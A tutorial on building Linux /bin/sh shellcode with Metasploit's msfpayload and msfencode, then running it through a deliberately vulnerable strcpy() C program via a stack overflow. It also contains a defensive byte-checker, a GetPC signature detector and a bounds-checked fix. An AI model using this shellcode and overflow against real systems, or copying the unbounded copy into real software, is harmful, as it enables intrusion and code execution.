HowTo: Using MSF to Make Linux Shellcode

Here's a quick one-liner to make Linux shellcode that runs exec("/bin/sh"). The last argument, -t c, tells msfencode to emit the result as a C array.

msfpayload linux/x86/exec CMD=/bin/sh R | msfencode -b '\x00\xff' -t c > shellcode.h

The program msfpayload generates shellcode that calls exec("/bin/sh") on Linux and emits it raw (R). msfencode then re-encodes those bytes, prepending a small decoder stub, so that the output contains no \x00 (null bytes, which would terminate a strcpy() of the payload) and no \xff bytes.
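To verify that claim on the page's own output, here is an added example (not from the original post, and not Metasploit code). It embeds a copy of the array from shellcode.h as sample input, scans it for the excluded byte values, reports how many bytes a strcpy() would actually carry before stopping at a NUL, and searches for the fnstenv [esp-0xc] GetPC stub (bytes d9 74 24 f4) visible near the start of the array, a sequence that shellcode detectors commonly flag because polymorphic encoders emit it to locate their own decoder. The constructed with_nul input shows what happens to a payload that was not encoded.

```c
/* Added example (not from the original post): check that msfencode's output
 * really avoids the excluded bytes, and flag the fnstenv GetPC stub that
 * detectors use as a signature for encoded payloads. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Copy of the array from the post's shellcode.h, used here as sample input. */
static const unsigned char sample_buf[] =
"\xdb\xda\xd9\x74\x24\xf4\x5e\xbf"
"\xb2\xab\x6b\x26\x2b\xc9\xb1\x0b"
"\x31\x7e\x1a\x03\x7e\x1a\x83\xee"
"\xfc\xe2\x47\xc1\x60\x7e\x3e\x44"
"\x11\x16\x6d\x0a\x54\x01\x05\xe3"
"\x15\xa6\xd5\x93\xf6\x54\xbc\x0d"
"\x80\x7a\x6c\x3a\x9a\x7c\x90\xba"
"\xb4\x1e\xf9\xd4\xe5\xad\x91\x28"
"\xad\x02\xe8\xc8\x9c\x25";
#define SAMPLE_LEN (sizeof(sample_buf) - 1)   /* drop the literal's NUL */

/* The byte values the post excludes with -b '\x00\xff'. */
static const unsigned char excluded[] = { 0x00, 0xff };

/* Constructed input containing a NUL, to show why unencoded bytes matter. */
static const unsigned char with_nul[] = { 'A', 'B', 0x00, 'Z' };

/* Offset of the first byte of p that appears in bad[], or -1 if none. */
long first_bad_byte(const unsigned char *p, size_t n,
                    const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < n; i++)
        for (size_t j = 0; j < nbad; j++)
            if (p[i] == bad[j])
                return (long)i;
    return -1;
}

/* Offset of the fnstenv [esp-0xc] GetPC stub (d9 74 24 f4), or -1. */
long find_fnstenv_getpc(const unsigned char *p, size_t n)
{
    static const unsigned char stub[] = { 0xd9, 0x74, 0x24, 0xf4 };
    if (n < sizeof stub)
        return -1;
    for (size_t i = 0; i + sizeof stub <= n; i++)
        if (memcmp(p + i, stub, sizeof stub) == 0)
            return (long)i;
    return -1;
}

/* strcpy() stops at the first NUL: how many payload bytes would survive? */
size_t bytes_strcpy_would_copy(const unsigned char *p, size_t n)
{
    size_t i = 0;
    while (i < n && p[i] != 0)
        i++;
    return i;
}

int main(void)
{
    printf("encoded payload: %zu bytes\n", SAMPLE_LEN);
    printf("first excluded byte at: %ld\n",
           first_bad_byte(sample_buf, SAMPLE_LEN, excluded, sizeof excluded));
    printf("fnstenv GetPC stub at: %ld\n",
           find_fnstenv_getpc(sample_buf, SAMPLE_LEN));
    printf("bytes strcpy() would copy: %zu of %zu\n",
           bytes_strcpy_would_copy(sample_buf, SAMPLE_LEN), SAMPLE_LEN);
    printf("unencoded sample: strcpy() would copy %zu of %zu bytes\n",
           bytes_strcpy_would_copy(with_nul, sizeof with_nul),
           sizeof with_nul);
    return 0;
}
```

The GetPC search is the defender's half of the story: the same encoding that removes the excluded bytes leaves a recognisable decoder prologue, which is one reason encoded payloads are still caught by byte-pattern rules.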

This is shellcode.h:

unsigned char buf[] =
"\xdb\xda\xd9\x74\x24\xf4\x5e\xbf"
"\xb2\xab\x6b\x26\x2b\xc9\xb1\x0b"
"\x31\x7e\x1a\x03\x7e\x1a\x83\xee"
"\xfc\xe2\x47\xc1\x60\x7e\x3e\x44"
"\x11\x16\x6d\x0a\x54\x01\x05\xe3"
"\x15\xa6\xd5\x93\xf6\x54\xbc\x0d"
"\x80\x7a\x6c\x3a\x9a\x7c\x90\xba"
"\xb4\x1e\xf9\xd4\xe5\xad\x91\x28"
"\xad\x02\xe8\xc8\x9c\x25";

We can test it with this simple C program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "shellcode.h"   /* defines the global unsigned char buf[] above */

/* -------------------------------------------------- */
/* Deliberately vulnerable: strcpy() has no length limit, so an input
 * longer than 16 bytes runs past a[] and over the saved return address. */
void vuln(char * buf)
{
	char a[16] = { 0 };
	strcpy(a, buf);
}

int main(int argc, char * argv[])
{
	if (argc != 2)
	{
		printf("Usage: %s <input>\n", argv[0]);
		exit(1);
	}
	vuln(argv[1]);
	/* Print where the shellcode lives so we can see its address. */
	printf("%p\n", (void *)buf);

	return 0;
}
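For contrast, here is the same function with the unbounded strcpy() replaced by a length-checked copy. This is an added example, not part of the original post: vuln_fixed() keeps the 16-byte local from vuln() but rejects any input that does not fit together with its terminator, so the overlong input used later on this page returns an error instead of reaching the saved return address. The helper name copy_bounded and the return-value convention are this example's own choices.

```c
/* Added example (not from the original post): vuln() with a bounded copy. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define A_SIZE 16   /* same local buffer size as the post's vuln() */

/* Copy src into dst[dstsz] only if it fits with its terminating NUL.
 * Returns 0 on success, -1 if src is too long (dst is left empty).
 * src is never read beyond dstsz bytes, so an unterminated src is safe. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    if (dstsz == 0)
        return -1;
    size_t n = 0;
    while (n < dstsz && src[n] != '\0')
        n++;
    if (n == dstsz) {          /* no room left for the terminator */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);   /* copies the NUL as well */
    return 0;
}

/* Hardened counterpart of vuln(): returns the number of bytes accepted,
 * or -1 when the input was rejected as too long. */
int vuln_fixed(const char *buf)
{
    char a[A_SIZE] = { 0 };
    if (copy_bounded(a, sizeof a, buf) != 0) {
        fprintf(stderr, "input too long (max %zu bytes)\n", sizeof a - 1);
        return -1;
    }
    return (int)strlen(a);
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    return vuln_fixed(argv[1]) < 0 ? 2 : 0;
}
```

Run with the 24-byte input from later on the page and vuln_fixed() returns -1 before any byte lands outside a[]; a 15-byte input is accepted whole, and a 16-byte one is rejected because the terminator would not fit.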

When run normally, this program takes one argument as input and then prints the address of the shellcode buffer. (This is a contrived example.)

$ ./main test
0x804a040

So now all we have to do is overflow the buffer and put the address of the shellcode over the saved return address (byte-reversed, because x86 is little-endian). This only works because the binary was built without the usual mitigations: no stack canary to catch the overwrite, an executable data segment so the jump into buf runs, and a fixed address for buf because the executable is not position-independent.

$ echo $SHELL
/bin/bash
$ ./main `ruby -e 'puts "A"*20'``ruby -e 'puts "\x40\xa0\x04\x08"'`
sh-3.2$

And as you can see, we have launched /bin/sh.